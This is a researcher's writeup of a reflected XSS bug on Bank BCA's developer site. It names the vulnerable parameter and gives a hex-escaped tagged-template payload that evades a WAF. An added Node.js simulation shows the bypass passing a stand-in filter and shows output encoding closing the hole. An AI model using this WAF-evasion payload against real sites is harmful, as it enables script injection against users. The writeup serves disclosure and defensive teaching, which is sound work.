Bypassing a WAF's 500 "Unauthorized Access!" Response to Reach Reflected XSS (Cross-Site Scripting) on Developer BCA
Hello, here I just want to share my experience finding an XSS (cross-site scripting) bug at one of the banks in Indonesia, namely BCA (Bank Central Asia).
Little Story
I first came across this URL on 17 May 2019; it arrived in an email from Bank BCA's developer program, "Developer BCA".
This is where I found the parameter that is vulnerable to this XSS attack.
Parameter = /registration/confirmemail.php?confirm=0
Steps to Reproduce
1. Open the page https://developer.bca.co.id/registration/confirmemail.php?confirm=XSS
2. Then I tried adding a single quote (') and HTML tag characters (< and >): they were reflected back without any encoding at all.
3. When I tried to pop up a simple alert, like test Function`alert()``` , the website immediately returned an error page, most likely from the WAF, with a 500 status and the message "Unauthorized Access!"
At this point I felt quite pleased, because a few days earlier I had read a writeup on my Facebook feed that, in my opinion, described exactly the situation I was facing now!!!
4. Next I will show the payload from the writeup I mentioned earlier.
Full Payload: test '-Function`self['a'\x2b'l'\x2b'e'\x2b'r'\x2b't']\x281\x29```-'
How it works: the parameter is reflected inside a single-quoted JavaScript string, so the leading '-  closes that string and the trailing -' reopens the page's own closing quote, with the subtraction operators keeping the script syntactically valid. Function is invoked as a tagged template, which returns a new function whose body is the template text, and the empty ``  that follows calls it. The payload also uses JavaScript hex escape sequences inside the template literal: \x2b is "+", \x28 is "(" and \x29 is ")". The WAF inspects the raw request, where neither the word alert nor any parenthesis appears, but the JavaScript engine decodes the escapes when it cooks the template, which suggests the WAF rule was keying on literal parentheses or function names rather than on what the script actually does. The two forms below are therefore equivalent to the engine:
test '-Function`self['a'\x2b'l'\x2b'e'\x2b'r'\x2b't']\x281\x29```-'
test '-Function`self['a'+'l'+'e'+'r'+'t'](1)```-'
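The steps and payload above, modelled as an added Node.js example (this is not code from the original writeup or from BCA). The "WAF" rules, the reflecting page and the recording self.alert are all constructed stand-ins, since the real rule set is unknown; the script shows that a call-style filter blocks the naive and plain payloads, that the hex-escaped one passes and still calls alert(1), and that proper output encoding, not the WAF, is what actually closes the hole:

```javascript
// Added example, not code from the original writeup or from BCA. It models the
// bypass in Node.js: a constructed stand-in "WAF" that matches call-style
// parentheses and known sink names, a page that reflects the parameter into a
// single-quoted JavaScript string, and a fake `self.alert` that records calls
// instead of opening a dialog. The real BCA WAF rules are not known.

// Constructed WAF rules: block a known sink followed by "(", or any raw paren.
const WAF_RULES = [
  /\b(alert|prompt|confirm|eval)\s*\(/i,
  /[()]/,
];

function wafBlocks(value) {
  return WAF_RULES.some((re) => re.test(value));
}

// Vulnerable reflection (the writeup's case): the value is dropped verbatim
// into a script string literal, so a single quote terminates the string.
function reflectUnsafe(value) {
  return "var q = '" + value + "';";
}

// Hardened reflection: serialise as a JSON string literal and neutralise "<"
// and "/" so the value can never break out of the literal or the script tag.
function reflectSafe(value) {
  const lit = JSON.stringify(value)
    .replace(/</g, '\\u003c')
    .replace(/\//g, '\\/');
  return 'var q = ' + lit + ';';
}

// What the engine sees once it cooks the template-literal escapes
// (\x2b -> "+", \x28 -> "(", \x29 -> ")").
function cookTemplate(rawBody) {
  return new Function('return `' + rawBody + '`;')();
}

// Pass the parameter through the WAF, then execute the reflected script with
// a browser-like `self` global whose alert() only records its argument.
// Returns whether the WAF blocked the request and what alert() received.
function simulateRequest(value, reflect = reflectUnsafe) {
  const calls = [];
  if (wafBlocks(value)) return { blocked: true, calls };
  const saved = globalThis.self;
  globalThis.self = { alert: (x) => { calls.push(x); } };
  try {
    new Function(reflect(value))();
  } finally {
    globalThis.self = saved;
  }
  return { blocked: false, calls };
}

// Payloads as JS strings (backslashes doubled so the source carries a
// literal "\x2b", exactly as the raw request would).
const NAIVE = "test '-alert(1)-'";
const PLAIN = "test '-Function`self['a'+'l'+'e'+'r'+'t'](1)```-'";
const ENCODED =
  "test '-Function`self['a'\\x2b'l'\\x2b'e'\\x2b'r'\\x2b't']\\x281\\x29```-'";

function demo() {
  console.log('cooked body:',
    cookTemplate("self['a'\\x2b'l'\\x2b'e'\\x2b'r'\\x2b't']\\x281\\x29"));
  for (const p of [NAIVE, PLAIN, ENCODED]) {
    console.log(p, '->', simulateRequest(p));
  }
  console.log('hardened reflection ->', simulateRequest(ENCODED, reflectSafe));
}

demo();
```

Running it prints the cooked body self['a'+'l'+'e'+'r'+'t'](1), shows the naive and plain payloads blocked by the constructed rules, shows the hex-escaped payload passing the filter and calling alert(1), and shows that with reflectSafe the same payload is simply stored in q and nothing executes. The point for defenders is the last line: a regex WAF only ever sees bytes, while the engine sees decoded semantics, so context-correct output encoding is the fix and the WAF is at most a speed bump.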
Aaannnddddddd... it worked!!!
Bad Ending~
There was no response from the BCA team, but the bug has since been fixed :(
Reference
I hope you enjoyed this writeup!!! SSSSKKKKKRRRRTTTT!!!!